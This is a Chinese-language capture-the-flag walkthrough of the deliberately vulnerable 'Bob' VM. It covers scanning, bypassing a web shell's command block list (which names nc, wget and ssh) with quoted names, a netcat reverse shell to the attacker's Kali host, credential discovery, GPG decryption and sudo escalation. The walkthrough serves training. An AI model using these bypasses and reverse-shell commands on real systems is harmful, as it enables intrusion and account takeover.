信息收集

注:原本拿到这台靶机时,用 VMware 打开获取不到 IP 地址。经过同事的提示,发现把 VM 更新到最新版就行了,很玄学。

  • 首先查看 Kali IP 地址:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root at kali in ~ 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:36:e9:5d brd ff:ff:ff:ff:ff:ff
    inet 10.10.8.17/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
       valid_lft 1717sec preferred_lft 1717sec
    inet6 fe80::fff8:80c4:4cdf:a014/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

地址探测

  • 使用 Nmap 扫描出一个 IP:10.10.8.18
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root at kali in ~/Bob_v1.0.1 
$ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 11:37 CST
Nmap scan report for 10.10.8.1
Host is up (0.000078s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.18
Host is up (0.00022s latency).
MAC Address: 00:0C:29:6D:8A:D0 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000047s latency).
MAC Address: 00:50:56:E7:3A:52 (VMware)
Nmap scan report for 10.10.8.17
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 6.40 seconds

端口扫描

  • 扫描开放端口:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root at kali in ~/Bob_v1.0.1 
$ nmap -p- -sC -T4 --min-rate 10000 10.10.8.18 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 11:38 CST
Nmap scan report for 10.10.8.18
Host is up (0.000034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
| http-robots.txt: 4 disallowed entries 
| /login.php /dev_shell.php /lat_memo.html 
|_/passwords.html
|_http-title: Site doesn't have a title (text/html).
25468/tcp open  unknown
MAC Address: 00:0C:29:6D:8A:D0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds

服务识别

  • 扫描端口对应服务:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
root at kali in ~/Bob_v1.0.1 
$ nmap -p21,80,25468 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.18 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 11:39 CST
Nmap scan report for 10.10.8.18
Host is up (0.00050s latency).

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     ProFTPD 1.3.5b
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries 
| /login.php /dev_shell.php /lat_memo.html 
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
25468/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
|   256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
|_  256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (ED25519)
MAC Address: 00:0C:29:6D:8A:D0 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms 10.10.8.18

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.13 seconds

漏洞扫描

  • 使用 Nmap 进行漏洞扫描:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root at kali in ~/Bob_v1.0.1 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.18 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 11:40 CST
Nmap scan report for 10.10.8.18
Host is up (0.000058s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /login.html: Possible admin folder
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:6D:8A:D0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 43.86 seconds
  • 看了下扫出来的漏洞,没一个有用的。

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root at kali in ~/Bob_v1.0.1 
$ dirsearch -u http://10.10.8.18 -o $PWD/dirsearch.txt

  _|. _ _  _  _  _ _|_    v0.4.2                                                       
 (_||| _) (/_(_|| (_| )                                                                                                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/Bob_v1.0.1/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-24-06-14_11-41-58.log

Target: http://10.10.8.18/

[11:41:58] Starting: 
[11:41:59] 403 -  295B  - /.htpasswds                                      
[11:41:59] 403 -  299B  - /.htaccess.bak1                                  
[11:41:59] 403 -  301B  - /.htaccess.sample
......

root at kali in ~/Bob_v1.0.1 
$ cat dirsearch.txt | grep 200
200     3KB  http://10.10.8.18:80/about.html
200     3KB  http://10.10.8.18:80/contact.html
200     1KB  http://10.10.8.18:80/index.html
200     2KB  http://10.10.8.18:80/login.html
200     4KB  http://10.10.8.18:80/news.html
200   673B   http://10.10.8.18:80/passwords.html
200   111B   http://10.10.8.18:80/robots.txt

漏洞利用

信息泄露

  • 依次访问扫描出的内容,很明显这是一个自建的站点:

image-20240614114426063

  • 根据目录扫描的结果依次进行访问,总结如下:
访问页面 说明
about.html 关于站点的说明,没用
contact.html 关于网站联系人的一些信息,其中 Bob J 的联系方式包含了 admin,有可能是管理员
index.html 网站主页,没用,略过
login.html 一个登录界面,但是已经被禁用
news.html 站点的一些信息,没用
passwords.html 关于这个文件的一些废话,没用
robots.txt 网站防爬文件,记录有如下四个文件:
login.php:Not Found
dev_shell.php:WebShell 文件
lat_memo.html:一个提示,提示服务器上有一个 WebShell 文件
passwords.html:没用

WebShell 绕过

  • 访问 dev_shell.php 文件,页面内容如下:

image-20240614141359711

  • 直接执行效果不明显,在 Command 输入 whoami,使用 BurpSuite 抓包:

image-20240614141755847

  • 可以看到是能够执行命令的,尝试执行 ls 等敏感命令:

image-20240614141921766

  • 可以看到返回结果变成了:Get out skid lol,说明对方是有进行过滤。
  • 对于命令执行的过滤而言,常见的绕过方式是:单双引号、分隔符(${IFS})、特殊变量($9)等。
  • 使用 l’s’ 尝试一下:

image-20240614142616087

  • 可以看到对于 dev_shell.php 文件而言,有一个名为 dev_shell.php.bak 的备份文件,访问下载分析:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<html>
<body>
<?php
//init
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
......
<div id="shell">
    <h2>
        dev_shell
    </h2>
    <form action="dev_shell.php" method="post">
        Command: <input type="text" name="in_command"/> <br>
        <input type="submit" value="submit">
    </form>
    <br>
    <h5>Output:</h5>
    <?php
    system("running command...");
    //executes system Command
    //checks for sneaky ;
    if (strpos($command, ';') !== false) {
        system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
    } else {
        $is_he_a_bad_man = explode(' ', trim($command));
        //checks for dangerous commands
        if (in_array($is_he_a_bad_man[0], $bad_words)) {
            system("echo Get out skid lol");
        } else {
            system($_POST['in_command']);
        }
    }
    ?>
</div>
......
  • 简单分析一下,可以知道对方只进行了常用几个命令的匹配,使用单引号可以全部绕过了。

Shell 反弹

  • 既然过滤了 nc,说明可能就存在有 nc 命令,反弹试试:
1
n'c' -e /bin/bash 10.10.8.17 4444

image-20240614144532634

  • 在 Kali 上成功收到 Shell:
1
2
3
4
5
6
7
root at kali in ~/Bob_v1.0.1 
$ nc -lvvp 4444                                                       
listening on [any] 4444 ...
10.10.8.18: inverse host lookup failed: Unknown host
connect to [10.10.8.17] from (UNKNOWN) [10.10.8.18] 45514
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),100(users)
  • 由于获取到的 Shell 非交互式 Shell,使用 Python 升级一下:
1
2
3
4
5
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Milburg-High:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),100(users)
www-data@Milburg-High:/var/www/html$

主机信息收集

  • 查看当前系统中可使用的用户:
1
2
3
4
5
6
7
8
www-data@Milburg-High:/var/www/html$ cat /etc/passwd | grep /bin/bash
cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
  • 可以看到非常多的用户,查看是否有 SUID 文件:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
www-data@Milburg-High:/var/www/html$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/chsh
/bin/su
/bin/ping
/bin/umount
/bin/mount
/bin/ntfs-3g
/bin/fusermount
  • 目前来看,没有什么可用信息与文件。
  • 上笨办法,针对用户家目录进行查看:
1
2
3
4
www-data@Milburg-High:/var/www/html$ ls -alR /home/bob > /tmp/bob_home.txt 2>/dev/null
www-data@Milburg-High:/var/www/html$ ls -alR /home/jc > /tmp/jc_home.txt 2>/dev/null
www-data@Milburg-High:/var/www/html$ ls -alR /home/seb > /tmp/seb_home.txt 2>/dev/null
www-data@Milburg-High:/var/www/html$ ls -alR /home/elliot > /tmp/elliot_home.txt 2>/dev/null
  • 在 bob 家目录下发现一个 .old_passwordfile.html 文件,内容如下:
1
2
3
4
5
6
7
8
www-data@Milburg-High:/home/bob$ cat .old_passwordfile.html
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>
  • 可以看到 jc 和 seb 的密码内容,这里可以进行登录尝试。

GPG 解密

  • 之前在端口扫描时发现 25468 端口开放的是 SSH 服务,尝试连接:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root at kali in ~ 
$ ssh jc@10.10.8.18 -p 25468
The authenticity of host '[10.10.8.18]:25468 ([10.10.8.18]:25468)' can't be established.
ED25519 key fingerprint is SHA256:OY3LVMIRHTASgrwg8mXjqq8nFPrcwLV7lhRz0gpjwq4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.8.18]:25468' (ED25519) to the list of known hosts.
  __  __ _ _ _                        _____                          
 |  \/  (_) | |                      / ____|                         
 | \  / |_| | |__  _   _ _ __ __ _  | (___   ___ _ ____   _____ _ __ 
 | |\/| | | | '_ \| | | | '__/ _` |  \___ \ / _ \ '__\ \ / / _ \ '__|
 | |  | | | | |_) | |_| | | | (_| |  ____) |  __/ |   \ V /  __/ |   
 |_|  |_|_|_|_.__/ \__,_|_|  \__, | |_____/ \___|_|    \_/ \___|_|   
                              __/ |                                  
                             |___/                                   


jc@10.10.8.18's password: 
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jc@Milburg-High:~$ id
uid=1002(jc) gid=1002(jc) groups=1002(jc),100(users)
  • 登录成功,再次翻找文件,在 bob 目录下发现 gpg 加密文件:
1
2
3
4
5
6
7
/home/bob/Documents:
total 20
drwxr-xr-x  3 bob bob 4096 Mar  5  2018 .
drwxr-xr-x 18 bob bob 4096 Mar  8  2018 ..
-rw-r--r--  1 bob bob   91 Mar  5  2018 login.txt.gpg
drwxr-xr-x  3 bob bob 4096 Mar  5  2018 Secret
-rw-r--r--  1 bob bob  300 Mar  4  2018 staff.txt
  • 不过既然 login.txt.gpg 是加密,就需要查找密钥了,在 Secret 目录往下翻:
1
2
3
4
5
/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here:
total 12
drwxr-xr-x 2 bob bob 4096 Mar  5  2018 .
drwxr-xr-x 3 bob bob 4096 Mar  5  2018 ..
-rwxr-xr-x 1 bob bob  438 Mar  5  2018 notes.sh
  • 查看 notes.sh 内容:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
  • 说实话没看懂,经过百度,这TM是个藏头诗。
  • 密钥:HARPOCRATES
  • 既然有了密钥,尝试解密 login.txt.gpg 文件:
1
2
3
4
jc@Milburg-High:/home/bob/Documents$ gpg -d login.txt.gpg 
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_

image-20240614152250025

  • 得到 bob 用户的登录密码,尝试进行登录:
1
2
3
4
jc@Milburg-High:/home/bob/Documents$ su bob
Password: 
bob@Milburg-High:~/Documents$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob),27(sudo)

SUDO 提权

  • 这里看到 bob 用户属于 sudo 用户组,查看执行权限:
1
2
3
4
5
6
7
bob@Milburg-High:~/Documents$ sudo -l
[sudo] password for bob: 
Matching Defaults entries for bob on Milburg-High:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bob may run the following commands on Milburg-High:
    (ALL : ALL) ALL
  • bob 可以执行任意命令,那直接查看 flag 即可:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
bob@Milburg-High:~/Documents$ sudo cat /flag.txt
CONGRATS ON GAINING ROOT

        .-.
       (   )
        |~|       _.--._
        |~|~:'--~'      |
        | | :   #root   |
        | | :     _.--._|
        |~|~`'--~'
        | |
        | |
        | |
        | |
        | |
        | |
        | |
        | |
        | |
   _____|_|_________ Thanks for playing ~c0rruptedb1t